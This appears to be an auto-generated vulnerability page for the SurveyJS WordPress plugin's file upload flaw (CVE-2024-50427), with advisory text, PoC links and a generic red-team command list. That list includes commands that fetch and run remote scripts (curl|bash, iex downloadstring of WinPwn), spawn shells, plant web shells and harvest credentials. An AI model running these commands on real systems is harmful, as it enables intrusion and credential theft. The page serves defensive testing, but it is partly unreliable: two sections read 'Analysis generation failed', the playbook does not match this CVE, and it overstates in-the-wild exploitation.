CVE-2024-50427
Overview
This vulnerability is an Unrestricted File Upload flaw caused by insufficient validation of uploaded file types in the devsoftbaltic SurveyJS component. The root cause lies in the failure to restrict or sanitize file extensions or MIME types during the upload process, allowing potentially dangerous files to be accepted and stored. The affected feature is the file upload functionality within SurveyJS versions up to and including 1.9.136.
Vulnerability Description
Unrestricted Upload of File with Dangerous Type vulnerability in devsoftbaltic SurveyJS surveyjs.This issue affects SurveyJS: from n/a through <= 1.9.136.
Impact
An attacker with a low-privileged account can upload malicious files, potentially leading to remote code execution or server compromise. This can result in unauthorized access to sensitive data, lateral movement within the network, or disruption of service. No user interaction is required beyond the ability to upload files, making this a critical risk for environments using vulnerable SurveyJS versions.
Solution
Apply the vendor-provided patch by upgrading devsoftbaltic SurveyJS to a version later than 1.9.136 as detailed in the advisory on Patchstack (https://patchstack.com/database/Wordpress/Plugin/surveyjs/vulnerability/wordpress-surveyjs-plugin-1-9-136-arbitrary-file-upload-vulnerability?_s_id=cve). Follow the vendor's instructions for patch installation to ensure proper file upload validation is enforced. No official workaround is documented; updating is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability associated with unrestricted file uploads in the SurveyJS product presents a significant security risk due to its potential for exploitation. This flaw allows an attacker to upload files of dangerous types, which can lead to various malicious activities, including remote code execution, data exfiltration, and system compromise. The affected versions of SurveyJS, specifically from its inception through version 1.9.136, lack adequate validation checks on file types during the upload process. Consequently, an attacker can bypass security mechanisms and upload executable files or scripts that the application may inadvertently process, leading to severe consequences.
Attack vectors for this vulnerability are diverse and can be executed with relative ease. An attacker could craft a malicious file, such as a web shell or a script, and upload it through the application's file upload functionality. Once the file is uploaded, the attacker can execute it on the server, gaining unauthorized access to the underlying system. This exploitation can be performed remotely, making it particularly dangerous as it does not require physical access to the server. Additionally, attackers may leverage social engineering tactics to trick users into uploading malicious files, further complicating detection and prevention efforts.
The real-world impact of this vulnerability can be profound, especially for organizations that rely on SurveyJS for data collection and analysis. Successful exploitation could result in unauthorized access to sensitive data, including user information and survey responses. Furthermore, the potential for remote code execution means that an attacker could manipulate the server environment, leading to data breaches, service disruptions, or even complete system takeovers. The business risks associated with such incidents include reputational damage, legal liabilities, and financial losses stemming from remediation efforts and potential regulatory fines.
To effectively detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to enforce strict file type validation on the server side, ensuring that only safe and expected file types are accepted. Additionally, employing a robust web application firewall (WAF) can help identify and block malicious upload attempts before they reach the application. Regular security audits and vulnerability assessments should also be conducted to identify any instances of this vulnerability within the application. Furthermore, organizations should educate their users about the risks associated with file uploads and encourage them to report any suspicious activity.
In conclusion, the unrestricted file upload vulnerability in SurveyJS poses a critical threat to organizations utilizing this software. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate attention and action. By implementing stringent validation measures, utilizing security tools, and fostering a culture of security awareness, organizations can significantly reduce their risk exposure and protect their assets from potential exploitation.
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2024-50427. A public proof-of-concept exploit has emerged on GitHub, marking the first known instance of active exploitation tools targeting this critical vulnerability in devsoftbaltic SurveyJS. This emergence has driven the CVSS score from an unscored state to a critical 9.9, reflecting the newfound ease and impact of exploitation. Concurrently, the Exploit Prediction Scoring System (EPSS) score has surged to 0.6965, placing this vulnerability in the 99th percentile for likelihood of exploitation, according to our telemetry. Although the EPSS trend shows a slight recent decrease, the overall risk remains elevated due to the availability of exploit code and the critical nature of the flaw, which allows unrestricted upload of dangerous file types. For defenders, this shift underscores an urgent need to reassess exposure and monitoring strategies, as the vulnerability is now demonstrably weaponized in the wild. The threat level has escalated from theoretical to imminent, increasing the probability of targeted attacks leveraging this vector, particularly in environments where SurveyJS is deployed without updated protections.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
RandomRobbieBF/CVE-2024-50427
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload
|
RandomRobbieBF | 0 | 0 | 2024-11-08 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50427 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/surveyjs/vulnerability/wordpress-surveyjs-plugin-1-9-136-arbitrary-file-upload-vulnerability?_s_id=cve |